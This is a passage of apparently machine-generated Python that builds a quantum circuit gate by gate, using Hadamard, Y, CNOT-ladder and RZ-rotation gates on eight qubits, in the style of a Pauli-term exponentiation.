sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.950509, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.950509, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.950509, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.950509, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.950509, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.950509, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.950509, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.950509, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.615899, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.615899, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.615899, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.615899, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.615899, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.615899, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.615899, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.615899, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.300548, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.300548, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.300548, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.300548, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.300548, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.300548, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.300548, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.300548, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.061758, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.061758, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.061758, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.061758, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.061758, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.061758, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.061758, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.061758, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.297123, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.297123, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.297123, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.297123, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.297123, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.297123, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.297123, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.297123, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.49365, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.49365, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.49365, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.49365, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.49365, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.49365, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
